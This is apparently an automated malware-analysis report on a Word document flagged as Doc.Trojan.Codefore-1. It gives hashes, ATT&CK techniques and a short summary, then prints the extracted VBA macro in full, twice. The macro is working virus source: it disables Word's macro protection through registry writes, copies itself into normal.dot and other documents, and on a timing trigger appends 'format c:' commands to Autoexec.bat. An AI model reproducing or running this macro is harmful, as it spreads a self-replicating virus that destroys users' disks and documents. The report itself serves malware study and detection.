Office (OLE) malware analysis — malicious · 7fbadb1f2e9a48b8

MALICIOUS

Office (OLE)

39.5 KB Created: 2000-09-07 15:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 7ab71cbddd97976f5912eba1c3cf6119 SHA-1: 236d5446a38e56a7c106779681e6c8da2d7d5ed2 SHA-256: 7fbadb1f2e9a48b8a642cf47a6d0c1e545e1c4ed71afe7ddf0631fcac4c56f9c

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1546.001 Event Triggered Execution: Event Execution

The critical ClamAV heuristic indicates this is a known malicious document. The VBA macro attempts to lower Word's security settings by writing to registry keys such as 'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common\CodeForeColors'. It also attempts to write to 'HKEY_CURRENT_USER\Software\RYPLEY\CAR\RYPLEY', suggesting potential persistence or configuration. The macro's primary function appears to be disabling security features to facilitate further malicious activity.

Heuristics 2

ClamAV: Doc.Trojan.Codefore-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Codefore-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3193 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3193 bytes
SHA-256: `c15db01c90eab04f98ff989f77c86707a9afe23252309062a34fb8285548ad61`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RYPLEY" Attribute VB_Base = "1Normal.RYPLEY" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() On Error Resume Next: Dim CAR As Boolean: Randomize Set S = System: Set O = Options: Set L = Selection: Set F = Selection.Font S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1" S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 " S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 " S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 " S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 " S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\RYPLEY\CAR\", "RYPLEY") = "EL MEJOR DE LOS CINCO CONTINENTES" O.VirusProtection = False: O.ConfirmConversions = False: O.SavePropertiesPrompt = False: O.SaveNormalPrompt = False O.OptimizeForWord97byDefault = True: ActiveDocument.OptimizeForWord97 = True If GetAttr(NormalTemplate.Path & "\normal.dot") And vbReadOnly Then CAR = False If CAR = False Then SetAttr NormalTemplate.Path & "\normal.dot", vbNormal If CAR = False Then Application.Quit Else GoTo RYPLEY End If RYPLEY: Set A = ActiveDocument.VBProject.VBComponents.Item(1): Set N = NormalTemplate.VBProject.VBComponents.Item(1) Set AC = A.CodeModule: Set NC = N.CodeModule Open "c:\CAR.scf" For Output As #1 Print #1, VBProject.VBComponents.Item(1).CodeModule.Lines(1, VBProject.VBComponents.Item(1).CodeModule.CountOfLines) Close #1 If A.Name <> "RYPLEY" Then AC.DeleteLines 1, AC.CountOfLines AC.AddFromFile ("c:\CAR.scf") End If If N.Name <> "RYPLEY" Then NC.DeleteLines 1, NC.CountOfLines NC.AddFromFile ("c:\CAR.scf") End If A.Name = "RYPLEY": N.Name = "RYPLEY" If Minute(Now) = Second(Now) Then Open "C:\Autoexec.bat" For Append As #1 Print #1, "" Print #1, "@echo s\|format c: /q/c/v:RYPLEY >RYPLEY" Print #1, "@echo y\|format c: /q/c/v:RYPLEY >RYPLEY" Print #1, "@echo o\|format c: /q/c/v:RYPLEY >RYPLEY" Print #1, "@echo t\|format c: /q/c/v:RYPLEY >RYPLEY" Close #1 End If If Int(Rnd() * 10) < 1 Then L.WholeStory: L.Delete Unit:=wdCharacter, Count:=1: F.Name = "Times New Roman": L.ParagraphFormat.Alignment = wdAlignParagraphCenter: F.Bold = wdToggle: F.Size = 50 L.TypeText Text:="RYPLEY": L.TypeParagraph: F.Bold = wdToggle: F.Size = 20: L.TypeText Text:="EL MEJOR DE LOS CINCO CONTINENTES" End If ActiveDocument.BuiltInDocumentProperties(wdPropertyCompany) = "IMPUNIX ©" ActiveDocument.SaveAs FileName:=ActiveDocument.FullName Kill "c:\CAR.scf" 'IMPUNIX © presenta su Virus: RYPLEY 'Creado por tHEmASTER & $$Y & XBIT & K@NSERVERO End Sub

SHA-256: c15db01c90eab04f98ff989f77c86707a9afe23252309062a34fb8285548ad61

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RYPLEY"
Attribute VB_Base = "1Normal.RYPLEY"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




































































Private Sub Document_Close()
On Error Resume Next: Dim CAR As Boolean: Randomize
Set S = System: Set O = Options: Set L = Selection: Set F = Selection.Font
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\RYPLEY\CAR\", "RYPLEY") = "EL MEJOR DE LOS CINCO CONTINENTES"
O.VirusProtection = False: O.ConfirmConversions = False: O.SavePropertiesPrompt = False: O.SaveNormalPrompt = False
O.OptimizeForWord97byDefault = True: ActiveDocument.OptimizeForWord97 = True
If GetAttr(NormalTemplate.Path & "\normal.dot") And vbReadOnly Then
CAR = False
If CAR = False Then SetAttr NormalTemplate.Path & "\normal.dot", vbNormal
If CAR = False Then Application.Quit
Else
GoTo RYPLEY
End If
RYPLEY:
Set A = ActiveDocument.VBProject.VBComponents.Item(1): Set N = NormalTemplate.VBProject.VBComponents.Item(1)
Set AC = A.CodeModule: Set NC = N.CodeModule
Open "c:\CAR.scf" For Output As #1
Print #1, VBProject.VBComponents.Item(1).CodeModule.Lines(1, VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Close #1
If A.Name <> "RYPLEY" Then
AC.DeleteLines 1, AC.CountOfLines
AC.AddFromFile ("c:\CAR.scf")
End If
If N.Name <> "RYPLEY" Then
NC.DeleteLines 1, NC.CountOfLines
NC.AddFromFile ("c:\CAR.scf")
End If
A.Name = "RYPLEY": N.Name = "RYPLEY"
If Minute(Now) = Second(Now) Then
Open "C:\Autoexec.bat" For Append As #1
Print #1, ""
Print #1, "@echo s|format c: /q/c/v:RYPLEY >RYPLEY"
Print #1, "@echo y|format c: /q/c/v:RYPLEY >RYPLEY"
Print #1, "@echo o|format c: /q/c/v:RYPLEY >RYPLEY"
Print #1, "@echo t|format c: /q/c/v:RYPLEY >RYPLEY"
Close #1
End If
If Int(Rnd() * 10) < 1 Then
L.WholeStory: L.Delete Unit:=wdCharacter, Count:=1: F.Name = "Times New Roman":
L.ParagraphFormat.Alignment = wdAlignParagraphCenter: F.Bold = wdToggle: F.Size = 50
L.TypeText Text:="RYPLEY": L.TypeParagraph: F.Bold = wdToggle: F.Size = 20:
L.TypeText Text:="EL MEJOR DE LOS CINCO CONTINENTES"
End If
ActiveDocument.BuiltInDocumentProperties(wdPropertyCompany) = "IMPUNIX ©"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Kill "c:\CAR.scf"
'IMPUNIX © presenta su Virus: RYPLEY
'Creado por tHEmASTER & $$Y & XBIT & K@NSERVERO
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.